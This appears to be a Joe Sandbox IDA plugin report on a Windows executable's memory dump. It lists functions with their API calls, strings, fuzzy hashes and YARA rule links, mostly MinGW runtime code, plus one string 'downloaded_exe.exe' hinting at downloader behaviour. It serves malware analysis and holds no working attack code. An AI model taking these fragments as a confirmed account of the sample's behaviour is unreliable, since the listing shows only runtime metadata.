Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 885a26659c33f443753efe130903552dacc6079d670d766aea555209860e8389
Instruction ID: 1ccc62b0f89a1f3c5e18d68aeac2549cfa36b7fe1226a173e40c3fe06e904cdc
Opcode Fuzzy Hash: 885a26659c33f443753efe130903552dacc6079d670d766aea555209860e8389
Instruction Fuzzy Hash: 8CA15062A19B4694EF21FB1AE4400ADA360BBC8FD4BC50531DE6C077E5DE2CE551C3B1

Function 00007FF7FE900160 Relevance: 13.7, APIs: 9, Instructions: 153COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF7FE90018E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4ef775cdee9a57d32ea52f1c5ccfb11710653e2bb2873a2a7c2d1254bb5829d4
Instruction ID: 13c058e65cfefc1c4e56f9e53ff2fa84f23b933c14642538b3a7fc6790864df6
Opcode Fuzzy Hash: 4ef775cdee9a57d32ea52f1c5ccfb11710653e2bb2873a2a7c2d1254bb5829d4
Instruction Fuzzy Hash: BE518F22A0AA0295EB55FB34D4502BCA262BFC4B84FD88835DB2D077D5DE3CE541C3B2

Function 00007FF7FE90AF00 Relevance: 13.6, APIs: 9, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FE90AE60: EnterCriticalSection.KERNEL32(00000086,000000AE,?,00007FF7FE9ED210,00007FF7FE90B641), ref: 00007FF7FE90AE86
Part of subcall function 00007FF7FE90AE60: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FE9ED210), ref: 00007FF7FE90AEAB

TryEnterCriticalSection.KERNEL32 ref: 00007FF7FE90AF77
CloseHandle.KERNEL32 ref: 00007FF7FE90AFB9
CloseHandle.KERNEL32 ref: 00007FF7FE90AFC2
LeaveCriticalSection.KERNEL32 ref: 00007FF7FE90AFC7
DeleteCriticalSection.KERNEL32 ref: 00007FF7FE90AFD7
DeleteCriticalSection.KERNEL32 ref: 00007FF7FE90AFDC
DeleteCriticalSection.KERNEL32 ref: 00007FF7FE90AFE2
free.MSVCRT ref: 00007FF7FE90AFE7

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CriticalSection$Delete$CloseEnterHandleLeave$free
String ID:
API String ID: 3899327206-0
Opcode ID: ccf47fbf666ab15dba92da6aa22d75d12199ad97aa1fe2eb6cde3d001a1eacfe
Instruction ID: 25f5e48bf960d4490dfe936ac9b064b57a28f963f0425fcccd41fcccda34878d
Opcode Fuzzy Hash: ccf47fbf666ab15dba92da6aa22d75d12199ad97aa1fe2eb6cde3d001a1eacfe
Instruction Fuzzy Hash: B5415F23B0450645EB51EB36AC107A96251ABC1BB8FC84232DF7D473D5EE78D986C3B2

Function 00007FF7FE90AA80 Relevance: 13.6, APIs: 9, Instructions: 81COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007FF7FE90AAAB
CreateSemaphoreA.KERNEL32 ref: 00007FF7FE90AADE
CreateSemaphoreA.KERNEL32 ref: 00007FF7FE90AAF4
InitializeCriticalSection.KERNEL32(?,00007FF7FE9ED210,00007FF7FE90F8E8,?,?,00007FF7FE9ED210,00000000,00007FF7FE90F975,00007FF7FE9ED210,?,00007FF7FE9ED210,00007FF7FE90FF09,00007FF7FE9BDDA0,?,00007FF7FE9ED210), ref: 00007FF7FE90AB1C
InitializeCriticalSection.KERNEL32(?,00007FF7FE9ED210,00007FF7FE90F8E8,?,?,00007FF7FE9ED210,00000000,00007FF7FE90F975,00007FF7FE9ED210,?,00007FF7FE9ED210,00007FF7FE90FF09,00007FF7FE9BDDA0,?,00007FF7FE9ED210), ref: 00007FF7FE90AB22
InitializeCriticalSection.KERNEL32(?,00007FF7FE9ED210,00007FF7FE90F8E8,?,?,00007FF7FE9ED210,00000000,00007FF7FE90F975,00007FF7FE9ED210,?,00007FF7FE9ED210,00007FF7FE90FF09,00007FF7FE9BDDA0,?,00007FF7FE9ED210), ref: 00007FF7FE90AB28

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID:
API String ID: 2075313795-0
Opcode ID: 1fb56e4790fd883b41d8d7c19fac17c20930f31a72bf2378ec17c91eecec5378
Instruction ID: 2310d790ff8c86e54b4c1703b0b447f73d86dd69a7bad853b33ec9abfb2ed285
Opcode Fuzzy Hash: 1fb56e4790fd883b41d8d7c19fac17c20930f31a72bf2378ec17c91eecec5378
Instruction Fuzzy Hash: 5C21AE32B0960285FB59EF35A95037DA291AF95B94F8882358E2D473C4EE7C948083B2

Function 00007FF7FE8FEC00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FF7FE8FED1B

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF7FE8FEDB1
Mingw-w64 runtime failure:, xrefs: 00007FF7FE8FEC37
VirtualProtect failed with code 0x%x, xrefs: 00007FF7FE8FED8E
Address %p has no image-section, xrefs: 00007FF7FE8FEC72, 00007FF7FE8FEDC5

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 51ebcc561eb6ac76b90a40cf9aeea94451fbe1f8d5d0c70aca9dcf6ca7342445
Instruction ID: 8a048e0f7f2a6fb8b57a8b21d0bd2592d9d244b22781da2345cb13cdec73c259
Opcode Fuzzy Hash: 51ebcc561eb6ac76b90a40cf9aeea94451fbe1f8d5d0c70aca9dcf6ca7342445
Instruction Fuzzy Hash: 83519E72A18A4681EB11FB15E8416A9B760FBD4BA4FC45130DE2C077D4DE3CE551C7B1

Function 00007FF7FE90DEF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FE90CB70: TlsAlloc.KERNEL32 ref: 00007FF7FE90CBAD

TlsGetValue.KERNEL32 ref: 00007FF7FE90DF01

Strings

downloaded_exe.exe, xrefs: 00007FF7FE90DEF1

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: AllocValue
String ID: downloaded_exe.exe
API String ID: 1189806713-1849240386
Opcode ID: 6e7495d9256f96a0081e1c323fb4ef22da7f9b7c542ca17d7a4f9635fd5ebf6d
Instruction ID: 43dfb49e99f32fec2aae1a9c6a5a8e2e55942391f985b611a9cafef7f541a23f
Opcode Fuzzy Hash: 6e7495d9256f96a0081e1c323fb4ef22da7f9b7c542ca17d7a4f9635fd5ebf6d
Instruction Fuzzy Hash: 1E415122E1E51246FFA5FB35A8113B8A6906FC4B54FC85534DF3D062D6DE1CA88282F3

Function 00007FF7FE911C6A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68fileCOMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF7FE911BB7
fwrite.MSVCRT ref: 00007FF7FE911BDC
fwrite.MSVCRT ref: 00007FF7FE911C26
fputs.MSVCRT ref: 00007FF7FE911C38
fputc.MSVCRT ref: 00007FF7FE911C4C

Part of subcall function 00007FF7FE8FFDF0: RtlCaptureContext.KERNEL32 ref: 00007FF7FE8FFE82
Part of subcall function 00007FF7FE8FFDF0: RtlUnwindEx.KERNEL32 ref: 00007FF7FE8FFEBF
Part of subcall function 00007FF7FE8FFDF0: abort.MSVCRT ref: 00007FF7FE8FFEC5

Strings

what(): , xrefs: 00007FF7FE911C1F
terminate called recursively, xrefs: 00007FF7FE911BD2

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: abortfwrite$CaptureContextUnwindfputcfputs
String ID: what(): $terminate called recursively
API String ID: 918577357-2063472960
Opcode ID: 2d95b1309d90a5443becb6db9518e35e1f3fc507403e2dff76868f28ccf5b8dd
Instruction ID: ed49acdee8d31ac022bde03073ef8e1ee266b3c54c5f56cc19bb22822c324e7f
Opcode Fuzzy Hash: 2d95b1309d90a5443becb6db9518e35e1f3fc507403e2dff76868f28ccf5b8dd
Instruction Fuzzy Hash: FA219D21B1960655EB14FBBAD8553BDE255AFD4B80FC0003ADA6D0B7D6EE2CE50143F2

Function 00007FF7FE9150D0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE9150FA
memcmp.MSVCRT ref: 00007FF7FE915118
memcmp.MSVCRT ref: 00007FF7FE9151B6

Strings

basic_string::compare, xrefs: 00007FF7FE91515D, 00007FF7FE9151F5, 00007FF7FE915285, 00007FF7FE915335, 00007FF7FE91534E
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF7FE915164, 00007FF7FE9151FC, 00007FF7FE91528C, 00007FF7FE91533C, 00007FF7FE915355

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 1395bcc7f46bcb34ad74a8b6fae711b82a16b18b2102ae8de2af37493a92cc2e
Instruction ID: d5f6d5ea67b5e624b8ffb2d4fa4003413c4ac8cfd6ae5b0616e9ba8a055bb21e
Opcode Fuzzy Hash: 1395bcc7f46bcb34ad74a8b6fae711b82a16b18b2102ae8de2af37493a92cc2e
Instruction Fuzzy Hash: A951F492B0894685EF14FA2A98141FC92416F95BF0FD84631DE3C877E1ED1CD9818372

Function 00007FF7FE920CB0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE920CD9
memcmp.MSVCRT ref: 00007FF7FE920CFA
memcmp.MSVCRT ref: 00007FF7FE920D96

Strings

basic_string::compare, xrefs: 00007FF7FE920D3D, 00007FF7FE920DD5, 00007FF7FE920E65, 00007FF7FE920F15, 00007FF7FE920F2E
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF7FE920D44, 00007FF7FE920DDC, 00007FF7FE920E6C, 00007FF7FE920F1C, 00007FF7FE920F35

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 1db0391413730fa0fba652cabdb840e1f2f2c1830bfb7e0f3eaa268681409b80
Instruction ID: d8e1b4653b1e709d007ba2cf04dbfa09b91df8086a3b5e5be188ce61dee787b5
Opcode Fuzzy Hash: 1db0391413730fa0fba652cabdb840e1f2f2c1830bfb7e0f3eaa268681409b80
Instruction Fuzzy Hash: 6051B552B0964641EF14EA2AEC001F892529F95BE0FDD4231EE3C977D1EE1CE9C68372

Function 00007FF7FE90B320 Relevance: 10.7, APIs: 7, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FE90AE60: EnterCriticalSection.KERNEL32(00000086,000000AE,?,00007FF7FE9ED210,00007FF7FE90B641), ref: 00007FF7FE90AE86
Part of subcall function 00007FF7FE90AE60: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FE9ED210), ref: 00007FF7FE90AEAB

TryEnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FE9ED210,?,?,00000000,00007FF7FE9ED210,?,?), ref: 00007FF7FE90B393

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: b6f3321009d8b67ad0fe3ad65ff42e331f1aa4a28e9116b1361f28b05973d381
Instruction ID: d87d7ab334d251f049e1e04a2b0ee364a3ca3988c0b08ae00644235f5162b824
Opcode Fuzzy Hash: b6f3321009d8b67ad0fe3ad65ff42e331f1aa4a28e9116b1361f28b05973d381
Instruction Fuzzy Hash: 64911032A08A0286E754EF36A44026EB3A4EB85B94FD44131DF6E437D5EF7CD44587B2

Function 00007FF7FE90BDC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7FE90BE00

Strings

basic_string::_M_create, xrefs: 00007FF7FE90BDC2

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CurrentThread
String ID: basic_string::_M_create
API String ID: 2882836952-3122258987
Opcode ID: 1b01c46d73d494cef463e9fd00e84ad5f2c4daa12fc66a3a955624a4bff76f6f
Instruction ID: 6af09f48d33c327e0705ec487affa037b2e6d3c6a9d17331174d20d280780a1b
Opcode Fuzzy Hash: 1b01c46d73d494cef463e9fd00e84ad5f2c4daa12fc66a3a955624a4bff76f6f
Instruction Fuzzy Hash: 68314472A0920686FB55EF359804779E1919FC4B54FD88434CB2E862C5FE2CE88182F2

Function 00007FF7FE90D9E0 Relevance: 10.6, APIs: 7, Instructions: 81COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7FE90D9F5

Part of subcall function 00007FF7FE90CB70: TlsAlloc.KERNEL32 ref: 00007FF7FE90CBAD

TlsGetValue.KERNEL32 ref: 00007FF7FE90DA08
realloc.MSVCRT ref: 00007FF7FE90DA41
realloc.MSVCRT ref: 00007FF7FE90DA59
memset.MSVCRT ref: 00007FF7FE90DA7C
memset.MSVCRT ref: 00007FF7FE90DA92
SetLastError.KERNEL32 ref: 00007FF7FE90DAB9

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: ErrorLastmemsetrealloc$AllocValue
String ID:
API String ID: 2127548929-0
Opcode ID: d0e74b9e2aab4b78778f9211f07ce265e7a9bdb01a4a71cbbeac1803a79ac018
Instruction ID: 1ba237e7dd40d67f5bf6d1407675d75aebf1bfc29b6509d86ff8984860198b72
Opcode Fuzzy Hash: d0e74b9e2aab4b78778f9211f07ce265e7a9bdb01a4a71cbbeac1803a79ac018
Instruction Fuzzy Hash: C9216122A0964296EB05FF39A84056DA392BF84B94FC45435DE1D073D6EE3CE885C3F2

Function 00007FF7FE90DC70 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FE90CC20: TlsGetValue.KERNEL32 ref: 00007FF7FE90CD3F

longjmp.MSVCRT ref: 00007FF7FE90DCA8
TlsGetValue.KERNEL32 ref: 00007FF7FE90DCB4
CloseHandle.KERNEL32 ref: 00007FF7FE90DCDF
_endthreadex.MSVCRT ref: 00007FF7FE90DCF3
CloseHandle.KERNEL32 ref: 00007FF7FE90DD03
TlsSetValue.KERNEL32 ref: 00007FF7FE90DD1F
CloseHandle.KERNEL32 ref: 00007FF7FE90DD32

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CloseHandleValue$_endthreadexlongjmp
String ID:
API String ID: 3990644698-0
Opcode ID: 20f0e7a286ece05e17092721c798dd182a774ad39e0d09a14f396a96d45f1ccf
Instruction ID: 93acae2476ca9e71ee48e792969b1b63fea66951749b3309069eaa8fce3daa4c
Opcode Fuzzy Hash: 20f0e7a286ece05e17092721c798dd182a774ad39e0d09a14f396a96d45f1ccf
Instruction Fuzzy Hash: EA210761A19B5282FB55EF319810378B6A0AFC8B14FC95035CB1E072D4EF7CA845C3B2

Function 00007FF7FE90F650 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 52COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF7FE90F6C4
exit.MSVCRT ref: 00007FF7FE90F6CE

Strings

(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00007FF7FE90F6B3
Assertion failed: (%s), file %s, line %d, xrefs: 00007FF7FE90F6BD
../mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 00007FF7FE90F6AC
(, xrefs: 00007FF7FE90F6A4

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: exitfprintf
String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
API String ID: 4243785698-2396019738
Opcode ID: a00628f8c2c28648b9fc185610c0f1052646daeebd8c6bba47cbd1001b9c2d6c
Instruction ID: 5ec0a40f69a2e8a6783ace27ec9a3921f264369c1822ab745158dc07a3dd33b3
Opcode Fuzzy Hash: a00628f8c2c28648b9fc185610c0f1052646daeebd8c6bba47cbd1001b9c2d6c
Instruction Fuzzy Hash: 91114C62B0864586EB14FB79E4512B8A3A0FB88B48FC48431DA2C473E1DE2CD545C7B2

Function 00007FF7FE90A880 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7FE90A8A0
fprintf.MSVCRT ref: 00007FF7FE90A8BF
GetCurrentThreadId.KERNEL32 ref: 00007FF7FE90A8D5
fprintf.MSVCRT ref: 00007FF7FE90A8FC

Strings

C%p %lu V=%0X w=%ld %s, xrefs: 00007FF7FE90A8E3
C%p %lu %s, xrefs: 00007FF7FE90A8AE

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
